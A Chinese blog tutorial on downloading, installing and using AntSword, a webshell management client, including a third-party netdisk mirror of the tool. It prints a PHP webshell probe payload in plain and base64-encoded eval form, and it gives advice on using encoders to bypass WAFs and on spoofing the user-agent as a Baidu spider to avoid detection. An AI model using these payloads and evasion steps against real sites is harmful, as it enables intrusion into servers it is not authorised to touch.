中国蚁剑下载安装教程

中国蚁剑下载、装置、运用教程

我国蚁剑是一款开源的跨平台网站管理东西,它主要面向于合法授权的浸透测试安全人员以及进行惯例操作的网站管理员。

通俗的讲:我国蚁剑是 一 款比菜刀还牛的shell操控端软件。

我国蚁剑推崇模块化的开发思维,遵从开源,就要开得漂亮的准则,致力于为不同层次的人群供给最简单易懂、方便直接的代码展现及其修正说明,尽力让咱们能够一同为这个项目奉献出量力而行的点点滴滴,让这款东西真正能让咱们用得顺心、舒适,让它能为咱们施展出最人性化最适合你的才能!

一、中国蚁剑

下载

仅有官方github下载地址:https://github.com/AntSwordProject/

留意:咱们下载的时分需求下载两个部分,一个是项目中心源码”antSword“,另一个是加载器;加载器则分为三个版别:Mac、Windows、Linux。我国蚁剑下载

由于最近有网友反映,我国蚁剑项目中心源码”antSword“下载地址呈现了404,我就把我以前下载的给咱们分享出来一下吧!

百度网盘链接:https://pan.baidu.com/s/1Fl0_hFtCtfUgcNIOwKeGEA 提取码:nvjc

如网盘链接有失效,请谈论留言或Q上联络我!

共包含2个文件:

antSword.zip

AntSword-Loader-v4.0.3-win32-x64.zip

二、蚁剑装置

由于我下载的是“AntSword-Loader-v4.0.3-win32-x64.zip”,我就以Windows版别64位来示例了。

1、咱们解压“AntSword-Loader-v4.0.3-win32-x64.zip”后,双击“AntSword.exe”;

第一次装置项目需求先初始化,假如你现已下载了中心源码,就挑选项目源码的文件夹。(假如只下载了加载器,挑选一个空文件夹,加载器会主动帮你下载中心项目源码)。

留意:这个项目文件夹便是你以后需求备份的,存储着你的shell和shell内的材料。

我国蚁剑 初始化

2、等初始化完成后,再双击“AntSword.exe”即可正常发动!

我国蚁剑发动界面

三、蚁剑运用

运用其实跟菜刀几乎差不多,只是蚁剑功用更强大一些,下面就简单给咱们说说:

1、增加一个shell

首先:右键单击 – 增加数据;

我国蚁剑

其次:输入URL地址,衔接密码以及编码设置。PHP言语引荐编辑器运用chr加密;

我国蚁剑 shell衔接

再次:假如需求自己写编码器的加密类型,能够按下图来操作:

我国蚁剑编码器自定义

从次:还能够装备shell的恳求信息和post内容;

我国蚁剑恳求信息和post内容

最终:还能够装备全局代理;我国蚁剑装备全局代理

2、插件

蚁剑有一个插件市场,能够装置一些插件,插件有很多。以下是部份插件截图:

我国蚁剑插件

3、关于编码器

编码器是这个程序的过人之处,用编码器加密能够轻松绕过WAF。

无妨,咱们来对比一下默许不运用编码传输和base64编码传输的差异:

base64编码

明文传输,post内容为:

ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;echo "8e51f";die();

base64加密传输,post内容为:

_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@base64_decode($_POST[_0x4ee8506e59871]));

留意:其间,ant参数名称是shell密码。

再来看看chr编码传输,完全就悉数编码了。

chr编码

4、user-agent修正

要留意的是,软件默许的user-agent是:User-Agent: antSword/v2.0;而且大部分人都不会去自定义useragent,这就给waf和蜜罐白白送了一个特征,所以咱们要修正一下源代码:

修正项目路径:

antSwordmodulesrequest.js (修正const USER_AGENT = ‘antSword/v2.1’; 这一行代码!)

antSwordmodulesupdate.js (有两处要修正;可搜索“antSword/v2.0”来找到这两行代码!)

我这里是把antSword/v2.0antSword/v2.1修正为了Baiduspider-image,我改成了百度图片蜘蛛;

假如咱们还有什么不明白的,请查看中文说明书:https://doc.u0u.us/zh-hans/

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/12/16/%e4%b8%ad%e5%9b%bd%e8%9a%81%e5%89%91%e4%b8%8b%e8%bd%bd%e5%ae%89%e8%a3%85%e6%95%99%e7%a8%8b/

发表评论

邮箱地址不会被公开。 必填项已用*标注